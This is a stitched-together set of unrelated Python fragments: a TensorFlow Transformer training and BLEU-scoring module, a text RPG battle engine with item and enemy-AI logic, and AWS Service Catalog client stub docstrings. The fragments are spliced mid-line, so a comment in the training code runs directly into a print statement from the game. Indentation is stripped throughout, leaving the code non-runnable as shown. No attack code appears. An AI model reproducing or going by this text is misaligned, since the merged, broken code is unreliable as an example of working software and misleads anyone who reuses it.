os.remove(tmp_filename)
return uncased_score, cased_score
def evaluate_and_log_bleu(model,
params,
bleu_source,
bleu_ref,
vocab_file,
distribution_strategy=None):
"""Calculate and record the BLEU score.
Args:
model: A Keras model, used to generate the translations.
params: A dictionary, containing the translation related parameters.
bleu_source: A file containing source sentences for translation.
bleu_ref: A file containing the reference for the translated sentences.
vocab_file: A file containing the vocabulary for translation.
distribution_strategy: A platform distribution strategy, used for TPU based
translation.
Returns:
uncased_score: A float, the case insensitive BLEU score.
cased_score: A float, the case sensitive BLEU score.
"""
subtokenizer = tokenizer.Subtokenizer(vocab_file)
uncased_score, cased_score = translate_and_compute_bleu(
model, params, subtokenizer, bleu_source, bleu_ref, distribution_strategy)
logging.info("Bleu score (uncased): %s", uncased_score)
logging.info("Bleu score (cased): %s", cased_score)
return uncased_score, cased_score
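def _bleu_casing_demo():
    # Illustrative aside, not called by this script: "uncased" BLEU simply
    # lowercases hypotheses and references before scoring, which is why
    # bleu_wrapper is invoked twice above with a case-sensitivity flag.
    # sacrebleu is only a stand-in here (it is not a dependency of this file),
    # and the sentences are made up.
    import sacrebleu
    hyps = ["The Cat sat on the mat ."]
    refs = ["the cat sat on the mat ."]
    cased = sacrebleu.corpus_bleu(hyps, [refs]).score
    uncased = sacrebleu.corpus_bleu([h.lower() for h in hyps],
                                    [[r.lower() for r in refs]]).score
    return cased, uncased  # uncased >= cased whenever only casing differs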
class TransformerTask(object):
"""Main entry of Transformer model."""
def __init__(self, flags_obj):
"""Init function of TransformerMain.
Args:
flags_obj: Object containing parsed flag values, i.e., FLAGS.
Raises:
ValueError: if not using static batch for input data on TPU.
"""
self.flags_obj = flags_obj
self.predict_model = None
# Add flag-defined parameters to params object
num_gpus = flags_core.get_num_gpus(flags_obj)
self.params = params = misc.get_model_params(flags_obj.param_set, num_gpus)
params["num_gpus"] = num_gpus
params["use_ctl"] = flags_obj.use_ctl
params["is_tpu_pod"] = flags_obj.is_tpu_pod
params["data_dir"] = flags_obj.data_dir
params["model_dir"] = flags_obj.model_dir
params["static_batch"] = flags_obj.static_batch
params["max_length"] = flags_obj.max_length
params["decode_batch_size"] = flags_obj.decode_batch_size
params["decode_max_length"] = flags_obj.decode_max_length
params["padded_decode"] = flags_obj.padded_decode
params["num_parallel_calls"] = (
flags_obj.num_parallel_calls or tf.data.experimental.AUTOTUNE)
params["use_synthetic_data"] = flags_obj.use_synthetic_data
params["batch_size"] = flags_obj.batch_size or params["default_batch_size"]
params["repeat_dataset"] = None
params["dtype"] = flags_core.get_tf_dtype(flags_obj)
params["enable_metrics_in_training"] = flags_obj.enable_metrics_in_training
if params["dtype"] == tf.float16:
# TODO(reedwm): It's pretty ugly to set the global policy in a constructor
# like this. What if multiple instances of TransformerTask are created?
# We should have a better way in the tf.keras.mixed_precision API of doing
# this.
loss_scale = flags_core.get_loss_scale(flags_obj,
default_for_fp16="dynamic")
policy = tf.keras.mixed_precision.experimental.Policy(
"mixed_float16", loss_scale=loss_scale)
tf.keras.mixed_precision.experimental.set_policy(policy)
self.distribution_strategy = distribution_utils.get_distribution_strategy(
distribution_strategy=flags_obj.distribution_strategy,
num_gpus=num_gpus,
tpu_address=flags_obj.tpu or "")
if self.use_tpu:
params["num_replicas"] = self.distribution_strategy.num_replicas_in_sync
if not params["static_batch"]:
raise ValueError("TPU requires static batch for input data.")
else:
print("Running transformer with num_gpus =", num_gpus)
if self.distribution_strategy:
print("For training, using distribution strategy: ",
self.distribution_strategy)
else:
print("Not using any distribution strategy.")
@property
def use_tpu(self):
if self.distribution_strategy:
return isinstance(self.distribution_strategy,
tf.distribute.experimental.TPUStrategy)
return False
def train(self):
"""Trains the model."""
params = self.params
flags_obj = self.flags_obj
# Sets config options.
keras_utils.set_session_config(
enable_xla=flags_obj.enable_xla)
_ensure_dir(flags_obj.model_dir)
with distribution_utils.get_strategy_scope(self.distribution_strategy):
model = transformer.create_model(params, is_train=True)
opt = self._create_optimizer()
if params["use_ctl"]:
train_loss_metric = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
else:
model.compile(opt)
model.summary()
if self.use_tpu:
# Different from experimental_distribute_dataset,
# experimental_distribute_datasets_from_function requires
# per-replica/local batch size.
params["batch_size"] /= self.distribution_strategy.num_replicas_in_sync
train_ds = (
self.distribution_strategy
.experimental_distribute_datasets_from_function(
lambda ctx: data_pipeline.train_input_fn(params)))
else:
train_ds = data_pipeline.train_input_fn(params)
map_data_fn = data_pipeline.map_data_for_transformer_fn
train_ds = train_ds.map(
map_data_fn, num_parallel_calls=params["num_parallel_calls"])
if params["use_ctl"]:
train_ds_iterator = iter(train_ds)
callbacks = self._create_callbacks(flags_obj.model_dir, 0, params)
# TODO(b/139418525): Refactor the custom training loop logic.
@tf.function
def train_steps(iterator, steps):
"""Training steps function for TPU runs.
Args:
iterator: The input iterator of the training dataset.
steps: An integer, the number of training steps.
Returns:
A float, the loss value.
"""
def _step_fn(inputs):
"""Per-replica step function."""
inputs, targets = inputs
with tf.GradientTape() as tape:
logits = model([inputs, targets], training=True)
loss = metrics.transformer_loss(logits, targets,
params["label_smoothing"],
params["vocab_size"])
# Scales the loss, which results in using the average loss across all
# of the replicas for backprop.
scaled_loss = loss / self.distribution_strategy.num_replicas_in_sync
# De-dupes variables due to keras tracking issues.
tvars = list(
object_identity.ObjectIdentitySet(model.trainable_variables))
grads = tape.gradient(scaled_loss, tvars)
opt.apply_gradients(zip(grads, tvars))
# For reporting, the metric takes the mean of losses.
train_loss_metric.update_state(loss)
for _ in tf.range(steps):
train_loss_metric.reset_states()
self.distribution_strategy.experimental_run_v2(
_step_fn, args=(next(iterator),))
if self.use_tpu:
checkpoint = tf.train.Checkpoint(model=model, optimizer=opt)
latest_checkpoint = tf.train.latest_checkpoint(flags_obj.model_dir)
if latest_checkpoint:
checkpoint.restore(latest_checkpoint)
logging.info("Loaded checkpoint %s", latest_checkpoint)
if flags_obj.train_steps < flags_obj.steps_between_evals:
flags_obj.steps_between_evals = flags_obj.train_steps
iterations = flags_obj.train_steps // flags_obj.steps_between_evals
cased_score, uncased_score = None, None
cased_score_history, uncased_score_history = [], []
for i in range(1, iterations + 1):
print("Start train iteration:{}/{}".format(i, iterations))
history = None
if params["use_ctl"]:
if not self.use_tpu:
raise NotImplementedError(
"Custom training loop on GPUs is not implemented.")
train_steps_per_eval = tf.convert_to_tensor(
flags_obj.steps_between_evals, dtype=tf.int32)
# Runs training steps.
train_steps(train_ds_iterator, train_steps_per_eval)
train_loss = train_loss_metric.result().numpy().astype(float)
logging.info("Train Step: %d/%d / loss = %s",
i * flags_obj.steps_between_evals, flags_obj.train_steps,
train_loss)
checkpoint_name = checkpoint.save(
os.path.join(
flags_obj.model_dir,
"ctl_step_{}.ckpt".format(i * flags_obj.steps_between_evals)))
logging.info("Saved checkpoint to %s", checkpoint_name)
else:
if self.use_tpu:
raise NotImplementedError(
"Keras model.fit on TPUs is not implemented.")
history = model.fit(
train_ds,
initial_epoch=i - 1,
epochs=i,
steps_per_epoch=flags_obj.steps_between_evals,
callbacks=callbacks,
# If TimeHistory is enabled, progress bar would be messy. Increase
# the verbose level to get rid of it.
verbose=(2 if flags_obj.enable_time_history else 1))
logging.info("Train history: {}".format(history.history))
print("End train iteration:{}/{} global step:{}".format(
i,
iterations,
i*flags_obj.steps_between_evals))
if (flags_obj.bleu_source and flags_obj.bleu_ref):
uncased_score, cased_score = self.eval()
cased_score_history.append([i, cased_score])
uncased_score_history.append([i, uncased_score])
stats = ({
"loss": train_loss
} if history is None else misc.build_stats(history, callbacks))
if uncased_score and cased_score:
stats["bleu_uncased"] = uncased_score
stats["bleu_cased"] = cased_score
stats["bleu_uncased_history"] = uncased_score_history
stats["bleu_cased_history"] = cased_score_history
return stats
def eval(self):
"""Evaluates the model."""
if not self.predict_model:
self.predict_model = transformer.create_model(self.params, False)
self._load_weights_if_possible(
self.predict_model,
tf.train.latest_checkpoint(self.flags_obj.model_dir))
self.predict_model.summary()
return evaluate_and_log_bleu(
self.predict_model, self.params, self.flags_obj.bleu_source,
self.flags_obj.bleu_ref, self.flags_obj.vocab_file,
self.distribution_strategy if self.use_tpu else None)
def predict(self):
"""Predicts result from the model."""
params = self.params
flags_obj = self.flags_obj
with tf.name_scope("model"):
model = transformer.create_model(params, is_train=False)
self._load_weights_if_possible(
model, tf.train.latest_checkpoint(self.flags_obj.model_dir))
model.summary()
subtokenizer = tokenizer.Subtokenizer(flags_obj.vocab_file)
ds = data_pipeline.eval_input_fn(params)
ds = ds.map(lambda x, y: x).take(_SINGLE_SAMPLE)
ret = model.predict(ds)
val_outputs, _ = ret
length = len(val_outputs)
for i in range(length):
translate.translate_from_input(val_outputs[i], subtokenizer)
def _create_callbacks(self, cur_log_dir, init_steps, params):
"""Creates a list of callbacks."""
sfunc = optimizer.LearningRateFn(params["learning_rate"],
params["hidden_size"],
params["learning_rate_warmup_steps"])
scheduler_callback = optimizer.LearningRateScheduler(sfunc, init_steps)
callbacks = misc.get_callbacks()
callbacks.append(scheduler_callback)
ckpt_full_path = os.path.join(cur_log_dir, "cp-{epoch:04d}.ckpt")
callbacks.append(tf.keras.callbacks.ModelCheckpoint(ckpt_full_path,
save_weights_only=True))
return callbacks
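@staticmethod
def _checkpoint_path_demo():
    # Illustrative only (not called anywhere): Keras expands the {epoch:...}
    # placeholder in the ModelCheckpoint path at save time, so with the
    # "cp-{epoch:04d}.ckpt" template above each eval interval writes its own
    # weights file, e.g. cp-0001.ckpt, cp-0002.ckpt, ...
    template = "cp-{epoch:04d}.ckpt"
    return [template.format(epoch=e) for e in range(1, 4)]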
def _load_weights_if_possible(self, model, init_weight_path=None):
"""Loads model weights when it is provided."""
if init_weight_path:
logging.info("Load weights: {}".format(init_weight_path))
# TODO(b/139414977): Having the same variable restoring method for both
# TPU and GPU.
if self.use_tpu:
checkpoint = tf.train.Checkpoint(
model=model, optimizer=self._create_optimizer())
checkpoint.restore(init_weight_path)
else:
model.load_weights(init_weight_path)
else:
print("Weights not loaded from path:{}".format(init_weight_path))
def _create_optimizer(self):
"""Creates optimizer."""
params = self.params
# TODO(b/139414679): Explore the difference between using
# LearningRateSchedule and callback for GPU runs, and try to merge them.
lr_schedule = optimizer.LearningRateSchedule(
params["learning_rate"], params["hidden_size"],
params["learning_rate_warmup_steps"])
opt = tf.keras.optimizers.Adam(
lr_schedule if self.use_tpu else params["learning_rate"],
params["optimizer_adam_beta1"],
params["optimizer_adam_beta2"],
epsilon=params["optimizer_adam_epsilon"])
if params["dtype"] == tf.float16:
opt = tf.keras.mixed_precision.experimental.LossScaleOptimizer(
opt, loss_scale=flags_core.get_loss_scale(self.flags_obj,
default_for_fp16="dynamic"))
if self.flags_obj.fp16_implementation == "graph_rewrite":
# Note: when flags_obj.fp16_implementation == "graph_rewrite",
# dtype as
+ 1}: {temp_stat_changes[i][2].name}")
print(f"Description: '{temp_stat_changes[i][2].dscrpt}'\n")
print(f"Turns left: {temp_stat_changes[i][0] - self.battle_dict['turn_counter']}")
print(f"Health Modifier: {temp_stat_changes[i][1][Stat_Sheet.health] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {temp_stat_changes[i][1][Stat_Sheet.strength] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {temp_stat_changes[i][1][Stat_Sheet.armor] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {temp_stat_changes[i][1][Stat_Sheet.agility] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {temp_stat_changes[i][1][Stat_Sheet.power] * -1}" if temp_stat_changes[i][1][Stat_Sheet.power] != 0 else '', end='')
print()
del temp_stat_changes
if self.effect_dict['reverse_effect_enemy'] != []:
print('\nEnemy Status Effects:\n------------------------')
temp_stat_changes = self.effect_dict['reverse_effect_enemy']
for i in range(len(temp_stat_changes)):
print(f"Effect {i + 1}: {temp_stat_changes[i][2].name}")
print(f"Description: '{temp_stat_changes[i][2].dscrpt}'\n")
print(f"Turns left: {temp_stat_changes[i][0] - self.battle_dict['turn_counter']}")
print(f"Health Modifier: {temp_stat_changes[i][1][Stat_Sheet.health] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {temp_stat_changes[i][1][Stat_Sheet.strength] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {temp_stat_changes[i][1][Stat_Sheet.armor] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {temp_stat_changes[i][1][Stat_Sheet.agility] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {temp_stat_changes[i][1][Stat_Sheet.power] * -1}" if temp_stat_changes[i][1][Stat_Sheet.power] != 0 else '', end='')
print()
del temp_stat_changes
input(self.battle_dict['continue_prompt'])
def attack_use_debuff(self, target, debuff):
if isinstance(debuff, stat_item):
self.calc_effect_queue(target, debuff)
self.use_item_stat(target, debuff.stat_changes)
def use_item(self, thing, itm):
# if itm.stat_changes != [0, 0, 0, 0, 0]:
# Add above check to the item list generator
if itm in thing.collection.items:
try:
# Add specific instructions for healing items
if isinstance(itm, heal_item):
if thing.stats.health + itm.heal_amnt > thing.stats.max_health:
thing.stats.health = thing.stats.max_health
else:
thing.stats.health += itm.heal_amnt
write(f"{thing.name} used a {itm.name}, and regained {itm.heal_amnt} health.")
elif isinstance(itm, stat_item):
self.calc_effect_queue(thing, itm)
self.use_item_stat(thing, itm.stat_changes)
write(f"{thing.name} used a {itm.name}.")
thing.collection.rem_item(itm)
except ValueError:
print(f"This item does not exist in {thing.name}'s inventory.")
def chance_item(self, enemy):
enemy_has_stat_items = [isinstance(i, stat_item) for i in enemy.collection.items]
enemy_has_heal_items = [isinstance(i, heal_item) for i in enemy.collection.items]
if (True in enemy_has_stat_items) and (self.battle_dict['ai']['used_item'] > 0):
return round((100) / (1 + (self.e ** ((-1 / 2) * self.battle_dict['ai']['used_item']))) - 50)
elif (True in enemy_has_heal_items) and (self.battle_dict['ai']['used_item'] > 0):
return self.chance_heal(enemy)
else:
return 0
def percent_health(self, thing):
return ((thing.stats.health / thing.stats.max_health) * 100)
def chance_heal(self, enemy):
enemy_has_heal_items = [isinstance(i, heal_item) for i in enemy.collection.items]
if (True in enemy_has_heal_items) and (self.percent_health(enemy) <= 80):
return round(-25719423 + (89.67716 - -25719430)/(1 + ((self.percent_health(enemy) / 1720762) ** 1.286616)))
else:
return 0
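@staticmethod
def _ai_chance_curves_demo():
    # Illustrative helper, not part of the original class: chance_item() and
    # chance_heal() above are plain sigmoidal curve fits. Re-evaluating the
    # same constants standalone makes their shape easy to inspect (math.e
    # stands in for self.e; the sampled inputs below are arbitrary).
    import math

    def item_chance(turns_without_item):
        # 0% right after using an item, approaching 50% as turns accumulate.
        return round(100 / (1 + math.e ** (-0.5 * turns_without_item)) - 50)

    def heal_chance(percent_health):
        # Curve fit: roughly 97% near death, dropping under 30% at the
        # 80%-health cutoff enforced by the caller.
        return round(-25719423 + (89.67716 - -25719430) /
                     (1 + (percent_health / 1720762) ** 1.286616))

    for turns in (0, 1, 2, 4, 8):
        print(f"{turns} turn(s) without an item -> {item_chance(turns)}% item chance")
    for hp in (5, 25, 50, 79):
        print(f"{hp}% health -> {heal_chance(hp)}% heal chance")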
def switch_turn(self, power_data, enemy_used_item=False):
if self.battle_dict['power_counter'] < power_data:
self.battle_dict['power_counter'] += 1
else:
# Reset temporary power counter
self.battle_dict['power_counter'] = 1
if self.battle_dict['turn'] == Turn.Attack:
if self.battle_dict['first_turn'] == Turn.Defend:
self.battle_dict['turn_counter'] += 1
# Switch turn
self.battle_dict['turn'] = Turn.Defend
# Exit turn
raise TurnComplete
elif self.battle_dict['turn'] == Turn.Defend:
if self.battle_dict['first_turn'] == Turn.Attack:
self.battle_dict['turn_counter'] += 1
# Switch turn
self.battle_dict['turn'] = Turn.Attack
# Do extras based on item use
if enemy_used_item is True:
self.battle_dict['ai']['used_item'] = 0
else:
self.battle_dict['ai']['used_item'] += 1
# Exit turn
raise TurnComplete
else:
debug_info(ValueError('The turn counter was not set correctly.'), 'Somehow, the value of turn was switched away from 0 or 1, which are the accepted values.')
def hit_animate(self):
from time import sleep
cli_color('setterm --inversescreen on', 'color F0')
sleep(.2)
cli_color('setterm --inversescreen off')
sleep(.1)
cli_color('setterm --inversescreen on', 'color F0')
sleep(.03)
cli_color('setterm --inversescreen off')
sleep(.03)
cli_color('setterm --inversescreen on', 'color F0')
sleep(.03)
cli_color('setterm --inversescreen off')
def draw_hp(self, plyr, enemy):
clr_console()
prcnt_plyr_health = round(self.percent_health(plyr) / 2)
print(f'{plyr.name}: [', end='')
for i in range(50):
print('=' if i <= prcnt_plyr_health else '-', end='')
print(f"] ({plyr.stats.health}/{plyr.stats.max_health})")
del prcnt_plyr_health
prcnt_enemy_health = round(self.percent_health(enemy) / 2)
print(f'{enemy.name}: [', end='')
for i in range(50):
print('=' if i <= prcnt_enemy_health else '-', end='')
print(']')
del prcnt_enemy_health
def item_info(self, itm):
print(f"\n{itm.name}")
# Create barrier from name length
for i in itm.name:
print('-', end='')
print(f'\nDescription: "{itm.dscrpt}"')
if isinstance(itm, heal_item):
print('Type: Healing Item')
print(f"Heal Amount: {itm.heal_amnt}")
else:
print('\nType: Buff Item')
print(f"Turns Effective: {itm.duration}\n")
print(f"HP Modifier: {itm.stat_changes[Stat_Sheet.health]}\n" if itm.stat_changes[Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {itm.stat_changes[Stat_Sheet.strength]}\n" if itm.stat_changes[Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {itm.stat_changes[Stat_Sheet.armor]}\n" if itm.stat_changes[Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {itm.stat_changes[Stat_Sheet.agility]}\n" if itm.stat_changes[Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {itm.stat_changes[Stat_Sheet.power]}" if itm.stat_changes[Stat_Sheet.power] != 0 else '', end='')
def plyr_choose_item(self, plyr):
# Writeout valid items
valid_items = []
temp_index = 1
for i in range(len(plyr.collection.items)):
if isinstance(plyr.collection.items[i], heal_item) or isinstance(plyr.collection.items[i], stat_item):
print(f"{temp_index}. {plyr.collection.items[i].name}")
valid_items.append((temp_index, plyr.collection.items[i]))
temp_index += 1
if valid_items == []:
print('\nYou have no items to use.')
input(self.battle_dict['continue_prompt'])
raise ChooseAgain
print('\nEnter a number to use an item. \nType "info [number]" for more info about the item.\nType "q" to return to the previous menu.')
while True:
user_choice = str(input('\nChoice: '))
try:
# Determine action based on input
if "info" in user_choice:
for i in valid_items:
if i[0] == int(user_choice.split(' ')[1]):
self.item_info(i[1])
elif user_choice.lower() == 'q':
raise ChooseAgain
else:
# Convert user_choice to indexable integer
user_choice = int(user_choice)
# Try to access the selected attack and return it
for i in valid_items:
if i[0] == user_choice:
return i[1]
except (ValueError, IndexError, AttributeError):
print('Invalid input.')
def attack_info(self, collection, attack):
print(f"\n{attack.name}")
# Create barrier from name length
for i in attack.name:
print('-', end='')
print(f'\nDescription: "{attack.dscrpt}"')
print(f"Damage: {attack.dmg}")
print(f"Accuracy {attack.hit_rate}%")
try:
print(f"Ammo: {attack.ammo_type.name}")
print(f"Ammo Cost: {attack.ammo_cost} ({collection.count(attack.ammo_type)} in inventory)")
except AttributeError:
pass
try:
print(f"Debuff Effect: {attack.debuff.name}")
except AttributeError:
pass
def plyr_choose_attack(self, plyr):
print()
for i in range(len(plyr.attacks)):
print(f"{i + 1}. {plyr.attacks[i].name}")
# Prompt user
print('\nEnter a number to attack. \nType "info [number]" for more info about the attack.\nType "q" to return to the previous menu.')
while True:
user_choice = str(input('\nChoice: '))
try:
# Determine action based on input
if "info" in user_choice:
self.attack_info(plyr.collection.items, plyr.attacks[int(user_choice.split(' ')[1]) - 1])
elif user_choice.lower() == 'q':
raise ChooseAgain
else:
# Convert user_choice to indexable integer
user_choice = int(user_choice) - 1
try:
req_ammo = plyr.collection.items.count(plyr.attacks[user_choice].ammo_type)
if (plyr.attacks[user_choice].ammo_type in plyr.collection.items) and (req_ammo >= plyr.attacks[user_choice].ammo_cost):
return plyr.attacks[user_choice]
else:
print(f"You don't have enough {plyr.attacks[user_choice].ammo_type.name}s to use this attack.")
except AttributeError:
return plyr.attacks[user_choice]
except (ValueError, IndexError, AttributeError):
print('Invalid input.')
def enemy_use_heal_item(self, enemy):
# Use healing item
heals_ordered_best = []
# Generate list of healing items that don't overheal the enemy
for heal in enemy.collection.items:
if isinstance(heal, heal_item) and (enemy.stats.health + heal.heal_amnt <= enemy.stats.max_health):
heals_ordered_best.append((heal.heal_amnt, heal))
if heals_ordered_best != []:
# Order them by what item will heal them the most
heals_ordered_best.sort(reverse=True)
# Use the item
self.use_item(enemy, heals_ordered_best[0][1])
# Delete unneeded var
del heals_ordered_best
return True
# Create list of healing items and sort them based on how effective they are
temp_heal_list = []
for heal in enemy.collection.items:
if isinstance(heal, heal_item):
temp_heal_list.append((heal.heal_amnt, heal))
temp_heal_list.sort()
# Use item and display its use
write(f"{enemy.name} used a {temp_heal_list[0][1].name} and regained {enemy.stats.max_health - enemy.stats.health} health.")
self.use_item(enemy, temp_heal_list[0][1])
# Finish up
del temp_heal_list
del heals_ordered_best
return True
def enemy_use_item(self, enemy):
# Use item #
# Generate random number
enemy_choice = self.randnum(100)
# Check if there are valid items or not
valid_stat_items = (isinstance(itm, stat_item) for itm in enemy.collection.items)
if (enemy_choice <= self.chance_heal(enemy)) or all(check is False for check in valid_stat_items):
self.enemy_use_heal_item(enemy)
else:
# Use buff item
# Generate list of places in inventory where buff items exist
temp_stat_items = []
for i in range(len(enemy.collection.items)):
if isinstance(enemy.collection.items[i], stat_item):
temp_stat_items.append(i)
# Randomly select buff from list of places in inventory
enemy_choice = self.randnum(len(temp_stat_items) - 1, 0)
buff_choice = enemy.collection.items[temp_stat_items[enemy_choice]]
# Tell player and use buff
write(f"{enemy.name} used a {buff_choice.name}.")
self.use_item(enemy, buff_choice)
del temp_stat_items
return True
def enemy_determine_attack(self, enemy):
while True:
random_attack = enemy.attacks[self.randnum(len(enemy.attacks)) - 1]
if isinstance(random_attack, ammo_attack):
req_items = 0
for itm in enemy.collection.items:
if itm is random_attack.ammo_type:
req_items += 1
if req_items >= random_attack.ammo_cost:
return random_attack
elif isinstance(random_attack, ammo_attack) is False:
return random_attack
@abstractmethod
def player_win(self, plyr, enemy):
# The player wins
"""
This method is defined by users of Gilbo. If the player wins battle(), this method is called. Whether they loot the enemy, or gain experience, it must be defined here.
"""
@abstractmethod
def player_lose(self, plyr, enemy):
# The player loses
"""
This method is defined by users of Gilbo. If the player loses battle(), this method is called. Whether they lose money and respawn, or get booted out to the last time they saved, it must be defined here.
"""
def battle(self, plyr, enemy, spec_effect=None, music=None):
PageSize:
The maximum number of items to return with this call.
:rtype: dict
:returns:
"""
pass
def list_portfolios_for_product(self, ProductId: str, AcceptLanguage: str = None, PageToken: str = None, PageSize: int = None) -> Dict:
"""
Lists all portfolios that the specified product is associated with.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListPortfoliosForProduct>`_
**Request Syntax**
::
response = client.list_portfolios_for_product(
AcceptLanguage='string',
ProductId='string',
PageToken='string',
PageSize=123
)
**Response Syntax**
::
{
'PortfolioDetails': [
{
'Id': 'string',
'ARN': 'string',
'DisplayName': 'string',
'Description': 'string',
'CreatedTime': datetime(2015, 1, 1),
'ProviderName': 'string'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **PortfolioDetails** *(list) --*
Information about the portfolios.
- *(dict) --*
Information about a portfolio.
- **Id** *(string) --*
The portfolio identifier.
- **ARN** *(string) --*
The ARN assigned to the portfolio.
- **DisplayName** *(string) --*
The name to use for display purposes.
- **Description** *(string) --*
The description of the portfolio.
- **CreatedTime** *(datetime) --*
The UTC time stamp of the creation time.
- **ProviderName** *(string) --*
The name of the portfolio provider.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProductId: string
:param ProductId: **[REQUIRED]**
The product identifier.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:rtype: dict
:returns:
"""
pass
def list_principals_for_portfolio(self, PortfolioId: str, AcceptLanguage: str = None, PageSize: int = None, PageToken: str = None) -> Dict:
"""
Lists all principal ARNs associated with the specified portfolio.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListPrincipalsForPortfolio>`_
**Request Syntax**
::
response = client.list_principals_for_portfolio(
AcceptLanguage='string',
PortfolioId='string',
PageSize=123,
PageToken='string'
)
**Response Syntax**
::
{
'Principals': [
{
'PrincipalARN': 'string',
'PrincipalType': 'IAM'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Principals** *(list) --*
The IAM principals (users or roles) associated with the portfolio.
- *(dict) --*
Information about a principal.
- **PrincipalARN** *(string) --*
The ARN of the principal (IAM user, role, or group).
- **PrincipalType** *(string) --*
The principal type. The supported value is ``IAM`` .
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type PortfolioId: string
:param PortfolioId: **[REQUIRED]**
The portfolio identifier.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:rtype: dict
:returns:
"""
pass
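@staticmethod
def _pagination_demo():
    # Illustrative usage sketch, not part of the generated stub: every List*
    # call above pages through results via PageToken/NextPageToken. Assumes
    # boto3 credentials are configured; "port-xxxxxxxxxxxx" is a placeholder
    # portfolio id, not a real one.
    import boto3
    client = boto3.client("servicecatalog")
    token = None
    while True:
        kwargs = {"PortfolioId": "port-xxxxxxxxxxxx", "PageSize": 20}
        if token:
            kwargs["PageToken"] = token
        page = client.list_principals_for_portfolio(**kwargs)
        for principal in page.get("Principals", []):
            print(principal["PrincipalARN"], principal["PrincipalType"])
        token = page.get("NextPageToken")
        if not token:
            break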
def list_provisioned_product_plans(self, AcceptLanguage: str = None, ProvisionProductId: str = None, PageSize: int = None, PageToken: str = None, AccessLevelFilter: Dict = None) -> Dict:
"""
Lists the plans for the specified provisioned product or all plans to which the user has access.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisionedProductPlans>`_
**Request Syntax**
::
response = client.list_provisioned_product_plans(
AcceptLanguage='string',
ProvisionProductId='string',
PageSize=123,
PageToken='string',
AccessLevelFilter={
'Key': 'Account'|'Role'|'User',
'Value': 'string'
}
)
**Response Syntax**
::
{
'ProvisionedProductPlans': [
{
'PlanName': 'string',
'PlanId': 'string',
'ProvisionProductId': 'string',
'ProvisionProductName': 'string',
'PlanType': 'CLOUDFORMATION',
'ProvisioningArtifactId': 'string'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisionedProductPlans** *(list) --*
Information about the plans.
- *(dict) --*
Summary information about a plan.
- **PlanName** *(string) --*
The name of the plan.
- **PlanId** *(string) --*
The plan identifier.
- **ProvisionProductId** *(string) --*
The product identifier.
- **ProvisionProductName** *(string) --*
The user-friendly name of the provisioned product.
- **PlanType** *(string) --*
The plan type.
- **ProvisioningArtifactId** *(string) --*
The identifier of the provisioning artifact.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProvisionProductId: string
:param ProvisionProductId:
The product identifier.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:type AccessLevelFilter: dict
:param AccessLevelFilter:
The access level to use to obtain results. The default is ``User`` .
- **Key** *(string) --*
The access level.
* ``Account`` - Filter results based on the account.
* ``Role`` - Filter results based on the federated role of the specified user.
* ``User`` - Filter results based on the specified user.
- **Value** *(string) --*
The user to which the access level applies. The only supported value is ``Self`` .
:rtype: dict
:returns:
"""
pass
def list_provisioning_artifacts(self, ProductId: str, AcceptLanguage: str = None) -> Dict:
"""
Lists all provisioning artifacts (also known as versions) for the specified product.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisioningArtifacts>`_
**Request Syntax**
::
response = client.list_provisioning_artifacts(
AcceptLanguage='string',
ProductId='string'
)
**Response Syntax**
::
{
'ProvisioningArtifactDetails': [
{
'Id': 'string',
'Name': 'string',
'Description': 'string',
'Type': 'CLOUD_FORMATION_TEMPLATE'|'MARKETPLACE_AMI'|'MARKETPLACE_CAR',
'CreatedTime': datetime(2015, 1, 1),
'Active': True|False
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisioningArtifactDetails** *(list) --*
Information about the provisioning artifacts.
- *(dict) --*
Information about a provisioning artifact (also known as a version) for a product.
- **Id** *(string) --*
The identifier of the provisioning artifact.
